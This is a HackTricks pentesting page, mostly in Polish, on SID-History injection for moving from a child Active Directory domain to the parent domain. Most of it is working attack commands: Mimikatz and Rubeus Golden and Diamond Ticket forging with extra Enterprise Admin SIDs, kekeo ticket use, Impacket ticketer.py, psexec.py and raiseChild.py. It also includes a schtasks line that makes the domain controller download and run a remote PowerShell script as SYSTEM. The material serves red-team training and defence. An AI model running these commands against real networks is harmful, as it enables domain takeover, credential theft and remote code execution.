SID-History Injection

Dowiedz się, jak hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Atak wstrzykiwania historii SID

Celem ataku wstrzykiwania historii SID jest ułatwienie migracji użytkownika między domenami, zapewniając jednocześnie ciągły dostęp do zasobów z poprzedniej domeny. Dokonuje się tego przez włączenie poprzedniego identyfikatora zabezpieczeń (SID) użytkownika do historii SID ich nowego konta. Warto zauważyć, że ten proces można manipulować, dodając SID grupy o wysokich uprawnieniach (takich jak Enterprise Admins lub Domain Admins) z domeny nadrzędnej do historii SID. Wykorzystanie tego pozwala uzyskać dostęp do wszystkich zasobów w obrębie domeny nadrzędnej.

Istnieją dwie metody wykonania tego ataku: poprzez utworzenie Golden Ticket lub Diamond Ticket.

Aby zlokalizować SID grupy "Enterprise Admins", należy najpierw odnaleźć SID domeny głównej. Po zidentyfikowaniu SID grupy Enterprise Admins można skonstruować, dodając -519 do SID domeny głównej. Na przykład, jeśli SID domeny głównej to S-1-5-21-280534878-1496970234-700767426, wynikowy SID dla grupy "Enterprise Admins" będzie S-1-5-21-280534878-1496970234-700767426-519.

Można również użyć grupy Domain Admins, która kończy się na 512.

Innym sposobem na znalezienie SID grupy z innej domeny (na przykład "Domain Admins") jest:

Get-DomainGroup -Identity "Domain Admins" -Domain parent.io -Properties ObjectSid

Złoty bilet (Mimikatz) z KRBTGT-AES256

mimikatz.exe "kerberos::golden /user:Administrator /domain:<current_domain> /sid:<current_domain_sid> /sids:<victim_domain_sid_of_group> /aes256:<krbtgt_aes256> /startoffset:-10 /endin:600 /renewmax:10080 /ticket:ticket.kirbi" "exit"

/user is the username to impersonate (could be anything)
/domain is the current domain.
/sid is the current domain SID.
/sids is the SID of the target group to add ourselves to.
/aes256 is the AES256 key of the current domain's krbtgt account.
--> You could also use /krbtgt:<HTML of krbtgt> instead of the "/aes256" option
/startoffset sets the start time of the ticket to 10 mins before the current time.
/endin sets the expiry date for the ticket to 60 mins.
/renewmax sets how long the ticket can be valid for if renewed.

# The previous command will generate a file called ticket.kirbi
# Just loading you can perform a dcsync attack agains the domain

Aby uzyskać więcej informacji na temat złotych biletów, sprawdź:

pageGolden Ticket

Bilet diamentowy (Rubeus + KRBTGT-AES256)

# Use the /sids param
Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512 /sids:S-1-5-21-378720957-2217973887-3501892633-512 /krbkey:390b2fdb13cc820d73ecf2dadddd4c9d76425d4c2156b89ac551efb9d591a8aa /nowrap

# Or a ptt with a golden ticket
Rubeus.exe golden /rc4:<krbtgt hash> /domain:<child_domain> /sid:<child_domain_sid>  /sids:<parent_domain_sid>-519 /user:Administrator /ptt

# You can use "Administrator" as username or any other string

Aby uzyskać więcej informacji na temat biletów diamentowych, sprawdź:

pageDiamond Ticket
.\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local
.\kirbikator.exe lsa .\CIFS.mcorpdc.moneycorp.local.kirbi
ls \\mcorp-dc.moneycorp.local\c$

Eskaluj się do DA lub roota lub Enterprise admina, używając hasha KRBTGT skompromitowanej domeny:

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-211874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'

Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'

gwmi -class win32_operatingsystem -ComputerName mcorpdc.moneycorp.local

schtasks /create /S mcorp-dc.moneycorp.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "STCheck114" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"

schtasks /Run /S mcorp-dc.moneycorp.local /TN "STCheck114"

Z uzyskanymi uprawnieniami z ataku możesz na przykład przeprowadzić atak DCSync w nowej domenie:

pageDCSync

Z systemu Linux

Ręcznie za pomocą ticketer.py

# This is for an attack from child to root domain
# Get child domain SID
lookupsid.py <child_domain>/username@10.10.10.10 | grep "Domain SID"
# Get root domain SID
lookupsid.py <child_domain>/username@10.10.10.10 | grep -B20 "Enterprise Admins" | grep "Domain SID"

# Generate golden ticket
ticketer.py -nthash <krbtgt_hash> -domain <child_domain> -domain-sid <child_domain_sid> -extra-sid <root_domain_sid> Administrator

# NOTE THAT THE USERNAME ADMINISTRATOR COULD BE ACTUALLY ANYTHING
# JUST USE THE SAME USERNAME IN THE NEXT STEPS

# Load ticket
export KRB5CCNAME=hacker.ccache

# psexec in domain controller of root
psexec.py <child_domain>/Administrator@dc.root.local -k -no-pass -target-ip 10.10.10.10

Automatyczne użycie za pomocą raiseChild.py

To jest skrypt Impacket, który automatyzuje eskalację z domeny dziecka do domeny rodzica. Skrypt wymaga:

  • Docelowego kontrolera domeny

  • Poświadczeń dla użytkownika admina w domenie dziecka

Przebieg jest następujący:

  • Pobiera SID dla grupy Enterprise Admins w domenie rodzica

  • Pobiera hasło dla konta KRBTGT w domenie dziecka

  • Tworzy Złoty Bilet (Golden Ticket)

  • Loguje się do domeny rodzica

  • Pobiera poświadczenia dla konta Administratora w domenie rodzica

  • Jeśli jest określony przełącznik target-exec, uwierzytelnia się do kontrolera domeny domeny rodzica za pomocą Psexec.

raiseChild.py -target-exec 10.10.10.10 <child_domain>/username

Odwołania

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Last updated